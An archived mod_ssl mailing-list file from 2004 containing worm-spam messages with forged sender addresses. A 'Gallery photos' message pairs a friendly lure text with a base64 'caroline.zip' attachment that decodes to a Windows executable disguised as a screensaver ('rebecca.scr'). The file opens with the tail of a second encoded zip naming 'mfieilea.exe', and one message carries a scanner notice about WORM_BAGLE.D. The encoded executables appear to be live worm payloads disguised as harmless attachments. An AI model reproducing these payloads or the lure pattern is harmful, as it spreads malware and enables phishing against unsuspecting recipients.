R0vN/vk8uWC58RVkYzSST9POfQ+K/GTi56gZTOWsBvMVMl6PQUf+3M1sRjRUZobWHM1O/X7L
T1gnTyqoAgTxL9ZpTf04OG0/iBOVBKJ6jFOYdiNt8ARb8QwRSspXWvRvsNgdLkBCevJOnRyc
/xAm9cNDk9J5FNOH4cLGMlBGeSQOyuR+p1fmoAOUvds58VhSQ9pFWhJLQ6QulELTgY6qyFs3
L4Mh59z2v3Rp0r4Ve4vosidOaBmRqbq+2pZPRTWFgDBnok09JgKIqnNLYL4yCDCV+XgiIh/x
dRvTM6o5bwGbrB+2UCtqDxc+5KcSLvjMhAf5n+G2niSue6SWkwGTAel1PpaRCjCowq9eDPSu
uk7A4eI0j8AxXKIkcZD0T8qTs8SMIs/sJxHc/87dYdlzeXezH8hkp4eCcR3CkolcM7QXAoXN
BNQeNCPz3o13ddc7rx2JWC/sLWfG0YE14PCmz3SEZEnaqAbmWdwNKlgjgzNmgJm/hBPs7sMy
Py/lmy60AauD7Pjl7sTfy5kSCY7+OMpObm+UGS/BTC9iXQSidWDJdAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWl4zCCs3XZEnX3WIfSnDKmmb
Jw3CAn1UeSCGCYgXa0h8Y3V8KwE4XzFTiA6caLQGcm8TpzNRXcQaZnwOE0YyxjXCPIPHZx9H
FEQGI7kboLkMLJchoFVlKz4BQWoxN3ErK6WQbDrBi62SjsBHJRQhCYkxMxQHR8JKFniqXLA2
ThmaLCo6wHOiCKctLjkEHWp4vpVgAidfhxhqYwhMNlKWSIO8IayFD4FWQMUkJhcksXs0gbSl
XoFTKmN2nSlRmI9zp0RfLje7uYW0XZhzu7Ryw0IEu6QVPl5LscfHAsc2XDRmkhQ8bsJ9wmqI
UhRNsas/vasjAKskZ22DmImnZ3euSmCiFZ+GUZMERoAYMKafF02sqmyFDcIlqry/t2+0XnIW
pDKbxWgPfG8SRR0cOlFtG2JLFyCJSrCBdG94rm4BsR1NLy14dn9GO454r3Qop5wQVzhUPjQ5
XrXFhEq/e0OSYJmfbJGbdkWOdheeaGACCTQZTnhLk5U0UEsBAhQACgAAAAAAIJt9Ky8623Z3
QwAAd0MAAAwAAAAAAAAAAAAgAAAAAAAAAG1maWVpbGVhLmV4ZVBLBQYAAAAAAQABADoAAACh
QwAAAAA=

----------lgvvlviugttbiltbtnns--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 02:05:42 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D40FDA8972; Mon,  1 Mar 2004 02:05:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns8.sony.co.jp (NS8.Sony.CO.JP [137.153.0.33])
	by master.modssl.org (Postfix) with ESMTP id 41E24A893A
	for ; Mon,  1 Mar 2004 02:05:30 +0100 (CET)
Received: from mail6.sony.co.jp (mail6.sony.co.jp [43.0.1.208])
Received: from mail6.sony.co.jp (localhost [127.0.0.1])
	by mail6.sony.co.jp (R8/Sony) with ESMTP id i2115QT21141
	for ; Mon, 1 Mar 2004 10:05:26 +0900 (JST)
Received: from JPC00017304 ([43.17.120.27])
	by mail6.sony.co.jp (R8/Sony) with SMTP id i2115P021104
	for ; Mon, 1 Mar 2004 10:05:25 +0900 (JST)
Date: Mon, 01 Mar 2004 10:05:50 +0900
To: modssl-users@modssl.org
Subject: New Price-list
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vtehlmyfmqutjfeavcsw"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vtehlmyfmqutjfeavcsw
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit



----------vtehlmyfmqutjfeavcsw
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit


------------------  Virus Warning Message (on the network)

bdabbdcd.zip is removed from here because it contains a virus.

---------------------------------------------------------
----------vtehlmyfmqutjfeavcsw
Content-Type: text/plain; charset=iso-2022-jp
Content-Transfer-Encoding: 7bit

------------------  Virus Warning Message (on the network)

Found virus WORM_BAGLE.D in file hwhysgpy.exe (in bdabbdcd.zip)
The file is deleted.

Therefore we removed the attachment-file
by Mail Server and sent the message to you.

(Japanese)
$BK\%a!<%k$KE:IU$5$l$F$$$?%U%!%$%k$K%&%#%k%9$,46@w$7$F$*$j$^$7$?!#(B
$B$=$N$?$a!"%a!<%k%5!<%P$K$h$C$FE:IU%U%!%$%k$r
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 55150A8A4B; Mon,  1 Mar 2004 10:05:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from EPSON165651965 (gw81.soft.arch.sony.co.jp [210.168.56.81])
	by master.modssl.org (Postfix) with SMTP id 59BB8A8972
	for ; Mon,  1 Mar 2004 10:05:44 +0100 (CET)
Date: Mon, 01 Mar 2004 18:04:47 +0900
To: modssl-users@modssl.org
Subject: Gallery photos
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------plvfjdewrwjgysaugnow"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------plvfjdewrwjgysaugnow
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

I love meeting new people and making new friends. I am a Mary Kay Beauty Consultant. I am married to a wonderful man. We have no children, exept for a minature schnauzer that thinks he is a child. Looking forward to meeting you. 

----------plvfjdewrwjgysaugnow
Content-Type: application/octet-stream; name="caroline.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="caroline.zip"

UEsDBAoAAAAAACCPYTD9zlJi/FkAAPxZAAALAAAAcmViZWNjYS5zY3JNWpAAAwAAAAQAAAD/
/wAAuAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADYAAAADh+6
DgC0Cc0huAFMzSFUaGlzIHByb2dyYW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQok
AAAAAAAAAM6iefuKwxeoisMXqIrDF6iKwxeoicMXqATcBKi6wxeoYtwSqIvDF6h24wWoi8MX
qE3FEaiLwxeoUmljaIrDF6gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEFAAAAAAAA
AAAAAAAAAOAADwELAQAAAA4AAACAAAAAAAAAALAAAAAQAAAAIAAAAABAAAAQAAAAAgAABAAA
AAAAAAAEAAAAAAAAAAAAAQAABAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAA
AAAAAAAAADGyAADRAAAAAKAAAGAPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAArAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAACAAAAAAOAAAAAAAABA0AAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AEAAAMAABgAAAAAAAIoEAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAADAAGYAAAAAAAD0
aAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAwAAAAAAAAAAAYA8AAACgAAAAEAAAAAQA
AAAAAAAAAAAAAAABAEAAAMAAAAAAAAAAAABQAAAAsAAAAEQAAAAUAAAAAAAAAAAAAAAAAABA
AADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC
AAMAAAAgAACADgAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAAFAAAIAAAAAAAAAAAAAAAAAA
AAEAAQAAAGgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAEAAAAA
AJAAAACgoAAAqA4AAAAAAAAAAAAASK8AABQAAAAAAAAAAAAAACgAAAAwAAAAYAAAAAEACAAA
AAAAgAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////AAAAAACc//8Apf//AK3//wC1//8Avf//
AMb//wDO//8A1v//AN7//wDn//8A7///APf//wCM+/8AlPv/AK37/wB77/cAjPf/AMb7/wDO
+/8AhPP/AIzz/wCc7/cApff/ALX3/wDW+/8Ac+f3AITv/wCc8/8A3vv/AErP5wBj2+8Ae+v/
AIzv/wCM5/cArfP/AFrP5wBr3/cAhOv/AJzv/wCl7/8AtfP/AM73/wDn+/8AOb7eAELH5wBr
z+cAhOf/AJTr/wCM2+8Azu/3ACm23gAxut4AMZ69AFLP7wBaz+8AY9f3AGvT7wB74/8Ae8/n
AIzn/wCt5/cAte//AMbz/wAAns4AAJbGAAiezgAIkr0ACIq1ABCm1gAYqtYAGI61ACGy3gAp
st4AKa7WACGGpQA5vucAMYKcAEq63gBSvt4AWr7eAHPf/wB73/8AhM/nAKXj9wCt3+8Ave//
AMbr9wDe9/8AAJrOAACSxgAIjr0AEKLWABCezgAQfaUAGKreABim1gAhptYAGHmcACGizgAp
rt4AIYqtADG25wAxst4AObLeAELD7wApeZQAQrbeAErD7wBKtt4AWs/3AFK63gA5fZQAWsPn
AGvX/wBr0/cAY77eAHPb/wBrx+cAc8/vAHvL5wCE0+8AnN/3AKXn/wCl2+8A7/v/ACGq3gAp
qt4AQrLeAFLH9wBSvucAY9P/AFq+5wBjx+8Ac9f/AGvD5wB70/cAhNf3AIzT7wCc1+8Avef3
AMbv/wDW8/8AY8//AGvT/wCc2/cAteP3AEq+9wBjy/8AlNf3AK3f9wDO7/8A5/f/AL3j9wDe
8/8A1u//AO/3/wD3+/8A////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsbGxsbAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFtxfmJbRmxsbGwAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFtjfZKWg2hhW11kbGxsAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFtmfZKSkZGRkZFuS0JcYGxsbAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAFtmfXR0dHR0dHR0dHSFbktHW2xsbGwAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAFuAQIiIiIiIiIiIiIiIiFNTdINoYVtsbGxsAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAFuAWHd3d3d3d3d3d3d3d3d3U1NTVFRwTkpCbGxsbAAAAAAAAAAAAAAAAAAA
AAAAAFuAj1NTU1NTU1NTU1NTU1NTVFRUVFRUVFRUOmtLXmwAAAAAAAAAAAAAAAAAAAAAAFuA
jzw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8dTlsAAAAAAAAAAAAAAAAAAAAAFuAQT48PDw8
PDw8PDw8PDw8PDw8PDw8PDw8PDw8PJVsAAAAAAAAAAAAAAAAAAAAAFuAVjIxMTExMTExMTEx
MTExMTExMTExMTExMTExMZVsAAAAAAAAAAAAAAAAAAAAW4CAkzIoKCgoKCgoKCgoKCgoKCgo
KCgoKCgoKCgoKJFbbAAAAAAAAAAAAAAAAAAAW4CAkykdHR0dHR0dHR0dHR0dHR0dHR0dHR0d
HR0dHZFbbAAAAAAAAAAAAAAAAAAAW4CAfCUjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI5FL
bAAAAAAAAAAAAAAAAAAAW4GBeSsXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXF5FLbAAAAAAA
AAAAAAAAAAAAW2lpeBoTExMTExMTExMTExMTExMTExMTExMTExMTE5EmTwAAAAAAAAAAAAAA
AAAAW4SEeBoQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEJE7TWwAAAAAAAAAAAAAAAAAW4SE
eCwQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEJEkSWwAAAAAAAAAAAAAAAAAW4aGbRUDAwMD
AwMDAwMDAwMDAwMDAwMDAwMDAwMDA5EYRWwAAAAAAAAAAAAAAAAAW3OHahsDAwMDAwMDAwMD
AwMDAwMDAwMDAwMDAwMDA5EJW2wAAAAAAAAAAAAAAAAAW3uKahsEBAQEBAQEBAQEBAQEBAQE
BAQEBAQEBAQEBJEJRGwAAAAAAAAAAAAAAAAAW5eKRC0FBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBZEKaWwAAAAAAAAAAAAAAAAAW5eLRH8JBwYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBpEL
UXIAAAAAAAAAAAAAAAAAW5MqRFKZf38tHxsJCQgHBwcHBwcHBwcHBwcHBwcHB5ELME9sAAAA
AAAAAAAAAAAAW5gqJzVbRGqJe5Saf38tCAgICAgICAgICAgICAgICJEMM2dsAAAAAAAAAAAA
AAAAW5AeFxcXIicvNUhbRFBZDQoJCQkJCQkJCQkJCQkJCZENP0lsAAAAAAAAAAAAAAAAW5AZ
EBAQEBAQEBAQHDhEWQ0LCwsLCwsLCwsLCwsLC5ENkENsAAAAAAAAAAAAAAAAW1oRAwMDAwMD
AwMDAwMvRJ4ODg0NDAwMDAwMDAwMDJEODltsAAAAAAAAAAAAAAAAW5oFAwMDAwMDAwMDAwMD
Ll9qPYyOnAEBDg4ODg0NDZEBAV9sAAAAAAAAAAAAAAAAW5oUAwMDAwMDAwMDAwMEAxIhIDZK
W1tMaj2Njn8BAZABAWpsAAAAAAAAAAAAAAAAW40tAwMDAwMDAwMDAwUtfx8bCAcFAw8cISA2
SltbgkRERERsAAAAAAAAAAAAAAAAAFuaCAMDAwMDAwMDAy1Zam96e5Sdn58fCggGBQMWHFsA
AAAAAAAAAAAAAAAAAAAAAFt6DQMDAwMDAwMDCpplWwAAW1tbW1tqeHpXmw4NC0QAAAAAAAAA
AAAAAAAAAAAAAABfngEBDAwJCAYIAVBbAAAAAAAAAABbW1tbW1tbWwAAAAAAAAAAAAAAAAAA
AAAAAABbY4J2VYyONAEBjFsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AFtbW1tbW1tbNwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA////////AAD///////8AAP///////wAA////////AAD///////8AAP///////wAA/wf/
////AAD+AH////8AAP4AB////wAA/gAAf///AAD+AAAH//8AAP4AAAB//wAA/gAAAAf/AAD+
AAAAA/8AAP4AAAAB/wAA/gAAAAH/AAD+AAAAAf8AAPwAAAAA/wAA/AAAAAD/AAD8AAAAAP8A
APwAAAAA/wAA/AAAAAD/AAD8AAAAAH8AAPwAAAAAfwAA/AAAAAB/AAD8AAAAAH8AAPwAAAAA
fwAA/AAAAAB/AAD8AAAAAH8AAPwAAAAAPwAA/AAAAAA/AAD8AAAAAD8AAPwAAAAAPwAA/AAA
AAA/AAD8AAAAAD8AAPwAAAAAPwAA/AAAAAA/AAD+AAAAA/8AAP4AAwAD/wAA/wAH+Af/AAD/
AA////8AAP/AH////wAA////////AAD///////8AAP///////wAA////////AAD///////8A
AP///////wAAAAABAAEAMDAAAAEAGACoDgAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGDoAQAAAOiDxAToAQAAAOldge3ZIUAA
6AQCAADo6wjrAs0g/yQkmma+UkfoAQAAAJpZjZUrIkAA6AEAAABpWGa/TUrovwEAAI1S+egB
AAAA6FtozP/imv/kaf+lRyRAAOnouf///+sCzSCLxOsCzSCBABYAAAAPhaQBAABp6AAAAABY
mYDKFY0EAlDocAEAAGY9hvN0A+mNlc0iQADoZQEAAOgBAAAAaYPEBI29zCRAALmgQAAAuiC/
YKeKByrF9tAqwirG0sDSyDLB9tAyxTLCMsbSwALBAsUCwgLG0sgqwdPCiAdHSXXS6AEAAADo
g8QEDwvoK9JkiwKLIGSPAlhdw5qLlUckQADo+QAAAOgBAAAAx4PEBLtzjgAAagRoADAAAFNq
AP+VSyRAAOgBAAAA6IPEBGgAQAAAU1DoAQAAAOmDxARQjZXMJEAAUugOAAAA6AEAAABpg8QE
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
